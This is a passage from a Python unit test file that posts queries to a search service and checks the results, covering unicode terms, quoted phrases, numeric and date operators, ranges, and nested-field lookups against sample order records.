assert json_response["results"]["documents"] == [{u'_score': 1.0, u'_bucket': u'tests', u'_id': u'001', u'name': u"Antonia's"}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'002', u'name': u'Mis\xe9rables'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'003', u'name': u'na\xefve'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'004', u'name': u'caf\xe9'}], "Actual Response : %r" % json_response
def test_service_search_27_unicode_characters_index_only(self):
self.run_before_service_searcher_tests_unicode()
response = self.app.post('/service/search', data=json.dumps({"q":"Antonia's or Miserables or naive or cafe _bucket:tests"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 4, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 4, "Actual Response : %r" % json_response
assert json_response["results"]["documents"] == [{u'_score': 1.0, u'_bucket': u'tests', u'_id': u'001', u'name': u"Antonia's"}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'002', u'name': u'Mis\xe9rables'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'003', u'name': u'na\xefve'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'004', u'name': u'caf\xe9'}], "Actual Response : %r" % json_response
def test_service_search_28_unicode_characters_partial_query_stem_search(self):
self.run_before_service_searcher_tests_unicode()
response = self.app.post('/service/search', data=json.dumps({"q":"Antonia _bucket:tests"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 1, "Actual Response : %r" % json_response
assert json_response["results"]["num_results"] == 1, "Actual Response : %r" % json_response
assert json_response["results"]["documents"] == [{u'_score': 1.0, u'_bucket': u'tests', u'_id': u'001', u'name': u"Antonia's"}], "Actual Response : %r" % json_response
def test_service_search_29_multiple_term_originals(self):
self.run_before_service_searcher_tests_multiple_originals()
response = self.app.post('/service/search', data=json.dumps({"q":"Driving _bucket:tests"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'Driving _bucket:tests', u'documents': [{u'_score': 1.0, u'_bucket': u'tests', u'_id': u'005', u'name': u'Drive'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'006', u'name': u'Driving'}, {u'_score': 1.0, u'_bucket': u'tests', u'_id': u'007', u'name': u'driving'}], u'num_results': 3}, "Actual Response : %r" % json_response
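# Quoted phrases still match when the indexed title contains interior
# stopwords: "Eagle Iron" and "Eagle of Iron" both find 'Eagle of Iron'.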
def test_service_search_30_query_quote_with_stopwords_a(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'"Eagle Iron" _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'"Eagle Iron" _bucket:movies', u'documents': [{u'_score': 1.0, u'_bucket': u'movies', u'_id': u'Eagle of Iron', u'name': u'Eagle of Iron'}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_31_query_quote_with_stopwords_b(self):
self.run_before_service_searcher_tests()
response = self.app.post('/service/search', data=json.dumps({"q":'"Eagle of Iron" _bucket:movies'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'"Eagle of Iron" _bucket:movies', u'documents': [{u'_score': 1.0, u'_bucket': u'movies', u'_id': u'Eagle of Iron', u'name': u'Eagle of Iron'}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_32_query_all_bucket_documents(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"_bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert len(json_response["results"]["documents"]) == 7, "Actual Response : %r" % json_response
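# Numeric field operators: ':=', ':>', ':>=', ':<' and ':<=' compare the
# field's numeric value (tests 33-37).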
def test_service_search_33_query_numeric_operator_equal(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":'total:=250 _bucket:orders'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:=250 _bucket:orders', u'documents': [{u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_34_query_numeric_operator_gt(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>250 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>250 _bucket:orders', u'documents': [{u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 1.633233, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}, {u'_id': u'004', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.320535, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'total': 450}], u'num_results': 2}, "Actual Response : %r" % json_response
def test_service_search_35_query_numeric_operator_get(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>=300 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>=300 _bucket:orders', u'documents': [{u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 1.633233, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}, {u'_id': u'004', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.320535, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'total': 450}], u'num_results': 2}, "Actual Response : %r" % json_response
def test_service_search_36_query_numeric_operator_lt(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:<250 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:<250 _bucket:orders', u'documents': [{u'_id': u'005', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 2.392164, u'shipping': {u'city': u'florida', u'state': u'fl'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 50}, {u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 4}, "Actual Response : %r" % json_response
def test_service_search_37_query_numeric_operator_let(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:<=250 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:<=250 _bucket:orders', u'documents': [{u'_id': u'005', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 2.392164, u'shipping': {u'city': u'florida', u'state': u'fl'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 50}, {u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 5}, "Actual Response : %r" % json_response
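# Two comparisons chained with '&' form a range, e.g. total:>=250&<=300
# (inclusive) versus total:>200&<300 (exclusive).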
def test_service_search_38_query_numeric_operator_all_inclusive_range(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>=250&<=300 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>=250&<=300 _bucket:orders', u'documents': [{u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 1.633233, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}], u'num_results': 2}, "Actual Response : %r" % json_response
def test_service_search_39_query_numeric_operator_non_inclusive_range(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>200&<300 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>200&<300 _bucket:orders', u'documents': [{u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}], u'num_results': 1}, "Actual Response : %r" % json_response
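# Nested fields use dot paths; 'shipping.state:pa' matches nothing because
# 'pa' only occurs under 'billing', never under 'shipping'.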
def test_service_search_40a_query_nested_field_invalid_value(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping.state:pa _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping.state:pa _bucket:orders', u'documents': [], u'num_results': 0}, "Actual Response : %r" % json_response
def test_service_search_40b_query_nested_field(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping.state:ca _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping.state:ca _bucket:orders', u'documents': [{u'total': 250, u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.290219, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'_id': u'001'}, {u'total': 300, u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 0.266435, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'_id': u'003'}, {u'total': 200, u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.243461, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'_id': u'002'}, {u'total': 450, u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.229199, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'_id': u'004'}], u'num_results': 4}, "Actual Response : %r" % json_response
def test_service_search_41_query_multiple_nested_fields(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping.state:ca billing.city:florida _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping.state:ca billing.city:florida _bucket:orders', u'documents': [{u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 0.376796, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}], u'num_results': 1}, "Actual Response : %r" % json_response
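# A leading dot ('.city') matches the named field under any parent, and it
# composes with the numeric operators and quoted values below.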
def test_service_search_42_query_deep_nested_generic_field(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":".city:pittsburgh _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.city:pittsburgh _bucket:orders', u'documents': [{u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.343752, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.288369, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'004', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.271476, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'total': 450}], u'num_results': 3}, "Actual Response : %r" % json_response
def test_service_search_43_query_deep_nested_generic_field_and_numeric_gt(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":".cost:>50 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.cost:>50 _bucket:orders', u'documents': [{u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 2}, "Actual Response : %r" % json_response
def test_service_search_44_query_deep_nested_generic_field_and_numeric_range(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":".cost:>84.1&<84.9 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.cost:>84.1&<84.9 _bucket:orders', u'documents': [{u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 2}, "Actual Response : %r" % json_response
def test_service_search_45_query_deep_nested_generic_field_with_quote(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":'.city:"los angeles" _bucket:orders'}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.city:"los angeles" _bucket:orders', u'documents': [{u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.486139, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 0.446299, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 0.407815, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}], u'num_results': 3}, "Actual Response : %r" % json_response
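# Dates take the same comparison and range operators as numbers; queries
# may use either MM/DD/YYYY (07/01/2015) or Mon/DD/YYYY (Oct/02/2015).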
def test_service_search_46_query_date_greaterthan(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"order_date:>07/01/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'order_date:>07/01/2015 _bucket:orders', u'documents': [{u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 1.633233, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 4}, "Actual Response : %r" % json_response
def test_service_search_47_query_date_range(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"order_date:>07/01/2015&<11/01/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'order_date:>07/01/2015&<11/01/2015 _bucket:orders', u'documents': [{u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 3}, "Actual Response : %r" % json_response
def test_service_search_48_query_date_lessthan(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"order_date:<11/01/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'order_date:<11/01/2015 _bucket:orders', u'documents': [{u'_id': u'005', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 2.392164, u'shipping': {u'city': u'florida', u'state': u'fl'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 50}, {u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'004', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.320535, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'total': 450}], u'num_results': 6}, "Actual Response : %r" % json_response
def test_service_search_49_query_date_with_nested_field_format_1(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping.shipping_date:Oct/02/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping.shipping_date:Oct/02/2015 _bucket:orders', u'documents': [{u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_50_query_date_with_nested_field_format_2(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping.shipping_date:=Oct/02/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping.shipping_date:=Oct/02/2015 _bucket:orders', u'documents': [{u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_51_query_date_with_nested_field_format_3(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":".shipping_date:=Oct/02/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.shipping_date:=Oct/02/2015 _bucket:orders', u'documents': [{u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_52_query_date_range_with_nested_field(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":".shipping_date:>=Oct/02/2015&<=Oct/02/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'.shipping_date:>=Oct/02/2015&<=Oct/02/2015 _bucket:orders', u'documents': [{u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 1}, "Actual Response : %r" % json_response
def test_service_search_53_query_date_with_invalid_nested_field_should_return_nothing(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"shipping_date:=Oct/02/2015 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'shipping_date:=Oct/02/2015 _bucket:orders', u'documents': [], u'num_results': 0}, "Actual Response : %r" % json_response
def test_service_search_54_query_numeric_operator_gt_negative(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>-250 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>-250 _bucket:orders', u'documents': [{u'_id': u'005', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 2.392164, u'shipping': {u'city': u'florida', u'state': u'fl'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 50}, {u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'001', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.865009, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 250}, {u'_id': u'003', u'billing': {u'city': u'florida', u'state': u'fl'}, u'_score': 1.633233, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Dec/01/2015', u'total': 300}, {u'_id': u'002', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.432004, u'shipping': {u'city': u'los angeles', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Jul/12/2015', u'total': 200}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'004', u'billing': {u'city': u'pittsburgh', u'state': u'pa'}, u'_score': 1.320535, u'shipping': {u'city': u'san francisco', u'state': u'ca'}, u'_bucket': u'orders', u'order_date': u'Mar/15/2015', u'total': 450}], u'num_results': 7}, "Actual Response : %r" % json_response
def test_service_search_55_query_numeric_operator_range_negative(self):
self.run_before_service_searcher_tests_dates_numeric_and_deep_fields_operators()
response = self.app.post('/service/search', data=json.dumps({"q":"total:>-250&<=50 _bucket:orders"}), content_type = 'application/json')
json_response = json.loads(response.data)
assert json_response["success"] == True, "Actual Response : %r" % json_response
assert json_response["results"] == {u'query': u'total:>-250&<=50 _bucket:orders', u'documents': [{u'_id': u'005', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 2.392164, u'shipping': {u'city': u'florida', u'state': u'fl'}, u'_bucket': u'orders', u'order_date': u'Mar/01/2015', u'total': 50}, {u'_id': u'006', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.871566, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}, {u'_id': u'007', u'billing': {u'city': u'erie', u'state': u'pa'}, u'_score': 1.335291, u'shipping': {u'city': u'florida', u'state': u'fl', u'cost': 84.32, u'shipping_date': u'Oct/02/2015'}, u'_bucket': u'orders', u'order_date': u'Oct/01/2015', u'total': 50}], u'num_results': 3}, "Actual Response : %r" % json_response
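# Boolean fields match with ':=true' / ':=false', here combined with the
# deep-field dot prefix.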
def test_service_search_56_query_boolean_operator(self):
self.run_before_service_searcher_tests_boolean_field_search()
